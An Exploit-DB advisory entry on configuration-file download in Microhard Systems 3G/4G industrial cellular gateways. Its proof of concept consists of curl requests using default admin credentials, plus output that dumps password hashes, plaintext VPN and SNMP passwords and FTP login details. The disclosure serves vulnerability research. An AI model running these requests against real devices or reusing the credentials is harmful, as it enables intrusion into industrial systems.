Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway – Configuration Download

• Exploit Database
• 19 阅读

• 作者： LiquidWorm
  日期： 2018-07-17
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45036/

• Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download
  
  
  Vendor: Microhard Systems Inc.
  Product web page: http://www.microhardcorp.com
  Affected version: IPn4G 1.1.0 build 1098
  IPn3Gb 2.2.0 build 2160
  IPn4Gb 1.1.6 build 1184-14
  IPn4Gb 1.1.0 Rev 2 build 1090-2
  IPn4Gb 1.1.0 Rev 2 build 1086
  Bullet-3G 1.2.0 Rev A build 1032
  VIP4Gb 1.1.6 build 1204
  VIP4G 1.1.6 Rev 3.0 build 1184-14
  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
  IPn3Gii / Bullet-3G 1.2.0 build 1076
  IPn4Gii / Bullet-LTE 1.2.0 build 1078
  BulletPlus 1.3.0 build 1036
  Dragon-LTE 1.1.0 build 1036
  
  Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
  using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
  features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
  Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
  RS232/485/422 devices!
  
  The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
  the widespread deployment of cellular network infrastructure for critical data collection.
  From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
  The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
  provides robust and secure wireless communication of Serial, USB and Ethernet data.
  
  The all new Bullet-3G provides a compact, robust, feature packed industrial strength
  wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
  to the next level by providing features such as Ethernet with PoE, RS232 Serial port
  and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
  Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
  worth looking at!
  
  The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
  wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
  cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
  system integration and design flexibility with dual Ethernet Ports and high power
  802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
  Control Lists, the Dragon-LTE provides a solution for any cellular application!
  
  The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
  network infrastructure for critical data communications. The VIP4Gb provides simultaneous
  network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
  I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
  any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
  It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
  
  Desc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective
  name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'
  and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain
  circumstances. This will enable the attacker to disclose sensitive information and help her
  in authentication bypass, privilege escalation and/or full system access.
  
  Tested on: httpd-ssl-1.0.0
   Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2018-5484
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php
  
  
  13.03.2018
  
  --
  
  
  /etc/m_cli/cli.conf:
  --------------------
  
  curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf" -H "Authorization: Basic YWRtaW46YWRtaW4=" |grep passwd
  % Total% Received % XferdAverage Speed TimeTime TimeCurrent
   DloadUpload Total SpentLeftSpeed
  100271910027190 0 257400:00:010:00:01 --:--:--2577
  passwd admin 
  
  
  /www/IPn4G.config:
  ------------------
  
  lqwrm@metalgear:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H "Authorization: Basic YWRtaW46YWRtaW4="
  % Total% Received % XferdAverage Speed TimeTime TimeCurrent
   DloadUpload Total SpentLeftSpeed
  100 13156100 131560 0 951000:00:010:00:01 --:--:--9512
  lqwrm@metalgear:~$ tar -zxf IPn4G.tar.gz ; ls
  config.boardinfoconfig.boardtypeconfig.dateconfig.nameetcIPn4G.tar.gzusr
  lqwrm@metalgear:~$ cat config.boardinfo config.boardtype config.date config.name 
  2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0
  Atheros AR7130 rev 2
  Thu Jul 12 12:42:42 PDT 2018
  IPn4G
  lqwrm@metalgear:~$ cat usr/lib/hardware_desc 
  modem_type="N930"
  LTE_ATCOMMAND_PORT="/dev/ttyACM0"
  LTE_DIAG_PORT=""
  LTE_GPS_PORT=""
  wificard = "0"
  lqwrm@metalgear:~$ ls etc/
  configcrontabsdropbearethersfirewall.userhostshttpd.confpasswdssl
  lqwrm@metalgear:~$ ls etc/config/
  comport dhcpgpsgatetr iperf modbusd notessdpServer twatchdogwebif_access_control
  comport2dropbeargpsripsec msmscomdntpclientsnmpd updatedd websockserver
  coova-chilliethernetgpsrecorderdkeepalive msshc ntrd snmpd.confvlan wireless
  croneurdgre-tunnels localmonitornetwork pimd systemvnstat wsclient
  crontabsfirewallhttpd lte network_IPnVTn3Gping timezonevpnc
  datausemonitorgpsdioports lte362network_VIP4G salertdtmpstatus webif
  lqwrm@metalgear:~$ cat etc/passwd 
  root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
  admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
  upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
  at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
  nobody:*:65534:65534:nobody:/var:/bin/false
  testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
  testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
  testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
  msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
  
  
  /www/cgi-bin/system.conf:
  -------------------------
  
  lqwrm@metalgear:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H "Authorization: Basic YWRtaW46YWRtaW4="
  lqwrm@metalgear:~$ cat system.conf |grep -irnH "password" -A2
  system.conf:236:#VPN Admin Password:
  system.conf-237-NetWork_IP_VPN_Passwd=admin
  system.conf-238-
  --
  system.conf:309:#V3 Authentication Password:
  system.conf:310:NetWork_SNMP_V3_Auth_Password=00000000
  system.conf-311-
  system.conf:312:#V3 Privacy Password:
  system.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000
  
  
  Login to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.
  ---------------------------------------------------------------------------------------------